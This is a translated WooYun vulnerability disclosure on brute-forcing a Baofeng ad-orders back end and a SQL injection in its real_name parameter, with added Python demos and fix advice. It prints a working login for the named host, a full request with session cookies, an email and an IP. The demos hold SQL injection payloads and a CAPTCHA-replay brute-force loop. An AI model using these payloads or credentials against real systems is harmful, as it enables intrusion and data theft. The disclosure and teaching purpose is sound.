
Vulnerability summary

Defect ID: wooyun-2015-0127019

Title: Brute-forcing into the back end of a Baofeng (暴风影音) site + SQL injection

Vendor: 暴风影音 (Baofeng)

Author: null_z

Submitted: 2015-07-15 21:52

Fixed: 2015-08-30 15:32

Published: 2015-08-30 15:32

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: Details sent to the vendor; awaiting vendor handling
2015-07-16: Vendor confirmed; details visible to the vendor only
2015-07-26: Details disclosed to core white hats and domain experts
2015-08-05: Details disclosed to regular white hats
2015-08-15: Details disclosed to intern white hats
2015-08-30: Details disclosed to the public

Brief description:

Baofeng is great and takes security seriously.
They called today to say they are sending a gift, so here is one more check for you~~~

Detailed description:

First, this address can be brute-forced: http://adorders.huiyan.baofeng.com/
The CAPTCHA is not invalidated after use (a solved CAPTCHA can be replayed), so I loaded a top-500 name list and a top-10 password list.
Username: wangpeng
Password: 123456
This person is a sales director.
This alone already leaks a lot of supplier information, as shown:

[Screenshot: 2015-07-15 20:53:09]

[Screenshot: 2015-07-15 20:53:25]
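As an added example (not code from the report or from the site), the following Python models the CAPTCHA-reuse weakness the brute-force above depends on: a server-side CAPTCHA store that leaves a solved challenge valid after it has been checked, beside the single-use version, and a guessing loop that solves one CAPTCHA and replays it across a name x password list. The user table, the name and password lists and the store itself are assumptions; only wangpeng / 123456 comes from the report.

```python
import secrets
import string
from itertools import product

# Added example, not code from the report or from the site. It models the
# login gate described above: a CAPTCHA that stays valid after it has been
# checked, so one solved CAPTCHA covers an entire name x password run.
# The user table is constructed for the demo; only wangpeng/123456 comes from
# the report. Passwords are kept in clear only to keep the model short.
USERS = {"zhangwei": "Zw!2015secure", "wangpeng": "123456", "lihua": "L1hua#pass"}


class CaptchaStore:
    """Server-side record of issued CAPTCHA challenges, keyed by token."""

    def __init__(self, single_use: bool):
        self.single_use = single_use
        self.pending: dict[str, str] = {}

    def issue(self) -> tuple[str, str]:
        """Issue a challenge. The answer is what a human reads off the image."""
        token = secrets.token_hex(8)
        answer = "".join(secrets.choice(string.digits) for _ in range(4))
        self.pending[token] = answer
        return token, answer

    def verify(self, token: str, answer: str) -> bool:
        expected = self.pending.get(token)
        if expected is None:
            return False
        if self.single_use:
            # Hardened behaviour: consume the challenge on the first check,
            # right or wrong, so every login attempt costs a fresh CAPTCHA.
            del self.pending[token]
        return secrets.compare_digest(expected, answer)


def login(store: CaptchaStore, token: str, answer: str, user: str, pw: str) -> str:
    """One login POST. Returns which gate stopped the attempt, or "ok"."""
    if not store.verify(token, answer):
        return "captcha_rejected"
    if USERS.get(user) == pw:
        return "ok"
    return "bad_credentials"


def brute_force(store: CaptchaStore, names: list[str], passwords: list[str]):
    """Solve ONE CAPTCHA, then replay it for every name x password guess.
    Returns (credentials found, number of guesses the CAPTCHA gate rejected)."""
    token, answer = store.issue()      # the attacker solves this one by hand
    found, rejected = [], 0
    for name, pw in product(names, passwords):
        result = login(store, token, answer, name, pw)
        if result == "ok":
            found.append((name, pw))
        elif result == "captcha_rejected":
            rejected += 1
    return found, rejected


if __name__ == "__main__":
    names = ["zhangwei", "wangpeng", "lihua"]          # stand-in for a top-500 name list
    passwords = ["password", "123456", "111111"]       # stand-in for a top-10 password list
    print("reusable CAPTCHA:  ", brute_force(CaptchaStore(single_use=False), names, passwords))
    print("single-use CAPTCHA:", brute_force(CaptchaStore(single_use=True), names, passwords))
```

With the reusable store every one of the nine guesses reaches the credential check and wangpeng / 123456 falls out; with the single-use store only the first guess gets through and the other eight are stopped at the CAPTCHA. Consuming the challenge is the minimum; a per-account attempt counter or lockout is the usual complement, since a single-use CAPTCHA alone only raises the cost per guess.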


Then this endpoint is SQL-injectable.
Injectable parameter: real_name

GET /Acl/user/list?real_name=&is_delete=0&role_id=0 HTTP/1.1
Host: adorders.huiyan.baofeng.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Referer: http://adorders.huiyan.baofeng.com/Acl/user/list?real_name=&is_delete=1&role_id=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: bfuid=135601920076674909; bfuname=1341_9018_4; bfcsid=CUNFhCvV3Fn7o_Pq2kyM1Q%3D%3D; SSOStatus=1439523232; st=8WpHKKvbFsmwHXTB7pR-aiF6I5v6XQLfuLRIgr3_vi33v3S3Hk1ejLSeu2n5l0ery0jn8KfoSMabvPTWvXo6I5D4YIXdtqL9GuOU02YNmjqY5epCXqG0XY8R2iLof2mR; loginToken=GNYDm443uDZuyyxd9f0Aim38mEwh0N7mydSSRv7VHznV_GgFP1dMb90AvEkamaeBXlf-F8PNPpXxErHoAieYDmxVoaPv88j0h4HugQAXShovPmrPxCPxTr4UzvIm0n3TcIbUJWqCZkMJb065AtjE0-AYw1bGK9YRLkYAisnbctUWWAqrIBalyKVr0_CKJ-8UT1LEOmK0W4hYzvyme854MUKzZ1KSSfrJMkM9lTO-KkqyOAaaJ9bNJMwM3SJHeP_eYA2mX6pkM4vnSnG7I_IpAKyKqAvLBTE82Ig6uw1Ua4SaovMLmx_BoCuZX2Nb0QB0; bfsid=50bac3b32aa211e594eae83935af1128; vipssl_ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229e5ef996d986af286db344c06582435f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22117.151.114.114%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A103%3A%22Mozilla%2F5.0+%28X11%3B+Linux+i686%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F37.0.2062.120+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1436964025%3B%7D3292b4aa1811dc5c69ff07a128d68db0; PHPSESSID=f6eoeiirhtr0gpflfn33k1ep65; updateinforandomstr=bb4102d4c1ca16c6ea4b2c79f3c3b611; bf_sid=135601920076674909; bf_user_name=1341_9018_4; bf_sid_check=135601920076674909; umail=1341_9018_4%7C553664196%40qq.com; bali=22; uid=e3f5d5d5fd04ba347a7ae7869b2595547c7fba70; viinfo=Eqw-DERmIzQz3sd1WJFAJQ9xguIuoDHZQQxQP09EgsQJm_ZS3TmQByufKAbRD-2fpRrVzCjP-CSyxs-xk8detw; __utmt=1; __utma=131384592.545561278.1436764443.1436947928.1436964454.3; __utmb=131384592.1.10.1436964454; __utmc=131384592; __utmz=131384592.1436964454.3.3.utmcsr=fofa.so|utmccn=(referral)|utmcmd=referral|utmcct=/lab/ips; bfCollects=; _ga=GA1.2.545561278.1436764443; Hm_lvt_034253c5988f5d0fef5c2eaeff95573c=1436964431,1436964566,1436964568,1436964575; Hm_lpvt_034253c5988f5d0fef5c2eaeff95573c=1436964575; selected-tab=1


[Screenshot: 2015-07-15 20:59:01]

[Screenshot: 2015-07-15 20:59:10]
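As an added example that is not the site's code, the following Python reproduces the shape of the /Acl/user/list request: a user listing filtered by real_name, once with the parameter concatenated into the SQL text and once with a bound parameter, run against a constructed acl_user table in SQLite. The table, its rows and column names, the query builders and the two payloads are all assumptions; the report establishes only that real_name is injectable.

```python
import sqlite3

# Added example, not the site's code. It reproduces the shape of the request
# above (/Acl/user/list?real_name=&is_delete=0&role_id=0): a user list filtered
# on real_name. The table, its rows and both query builders are assumptions;
# the report only tells us that real_name is injectable.


def make_db() -> sqlite3.Connection:
    """Constructed acl_user table standing in for the site's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE acl_user (id INTEGER, real_name TEXT, role_id INTEGER, "
        "is_delete INTEGER, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO acl_user VALUES (?, ?, ?, ?, ?)",
        [
            (1, "Wang Peng", 3, 0, "hash_wp"),
            (2, "Li Hua", 2, 0, "hash_lh"),
            (3, "Zhao Min", 1, 1, "hash_zm"),   # soft-deleted; a normal listing hides it
        ],
    )
    return conn


def list_users_vulnerable(conn, real_name: str, is_delete: int, role_id: int):
    """The flaw: real_name is pasted into the SQL text, so quotes, OR and
    comment markers inside the parameter rewrite the query."""
    sql = (
        f"SELECT id, real_name FROM acl_user WHERE real_name LIKE '%{real_name}%' "
        f"AND is_delete = {int(is_delete)}"
    )
    if int(role_id):
        sql += f" AND role_id = {int(role_id)}"
    return conn.execute(sql).fetchall()


def list_users_fixed(conn, real_name: str, is_delete: int, role_id: int):
    """Same filter with a bound parameter: the wildcard is added to the value,
    the value never touches the SQL text, and the numeric filters are cast."""
    sql = "SELECT id, real_name FROM acl_user WHERE real_name LIKE ? AND is_delete = ?"
    params: list = [f"%{real_name}%", int(is_delete)]
    if int(role_id):
        sql += " AND role_id = ?"
        params.append(int(role_id))
    return conn.execute(sql, params).fetchall()


# Two payloads of the kind a scanner would try on real_name (constructed).
# Disables the is_delete filter and returns every account, deleted ones included:
PAYLOAD_OR = "%' OR 1=1 --"
# Appends a second SELECT so password hashes come back in the real_name column:
PAYLOAD_UNION = "' UNION SELECT id, password_hash FROM acl_user --"


def demo() -> dict:
    """Run a normal search and both payloads through each query builder."""
    conn = make_db()
    return {
        "normal": list_users_vulnerable(conn, "Wang", 0, 0),
        "or_vuln": list_users_vulnerable(conn, PAYLOAD_OR, 0, 0),
        "union_vuln": list_users_vulnerable(conn, PAYLOAD_UNION, 0, 0),
        "or_fixed": list_users_fixed(conn, PAYLOAD_OR, 0, 0),
        "union_fixed": list_users_fixed(conn, PAYLOAD_UNION, 0, 0),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:12} {rows}")
```

Against the concatenating version the OR payload returns all three accounts (the soft-deleted one included) and the UNION payload returns the password hashes in the name column; against the bound-parameter version both payloads are just search strings that match nothing. is_delete and role_id are cast with int() in both builders; the report does not say whether those parameters were also injectable, so that part is an assumption about the fix, not a finding. Note that the listing is only reachable with a logged-in session (the request carries the site's cookies), which is why the report pairs it with the brute-force: being behind a login does not make a back-end page safe to leave injectable.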

Proof of vulnerability:

The two screenshots above (2015-07-15 20:59:01 and 20:59:10).

Fix recommendation:

Add anti-brute-force measures (invalidate each CAPTCHA after one use and limit attempts). Also, even back-end pages must be protected against injection: bind real_name as a query parameter instead of concatenating it.

Copyright: please credit null_z@WooYun when reposting.


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-07-16 15:31

Vendor reply:

Thank you for the report; we will fix it as soon as possible.

Latest status:

None yet


Vulnerability assessment:

Comments

  1. 2015-07-15 22:21 | 小菜鸟入门 ( Passer-by | Rank:19 Vulns:9 | New here, please bear with me)

    What gift?

  2. 2015-07-15 23:27 | null_z ( Regular white hat | Rank:251 Vulns:30 )

    @小菜鸟入门 Haven't received it yet; it's a small gift, nothing to get excited about. The vendor's attitude is good.

  3. 2015-07-16 18:07 | 风格 ( Passer-by | Rank:18 Vulns:6 | Register as a white hat and you can submit the vulnerabilities you find here...)

    The gift is really just to get the reporter to go easy on them.

  4. 2015-07-23 00:08 | 夏七夕 ( Passer-by | Rank:2 Vulns:1 )

    Same as above.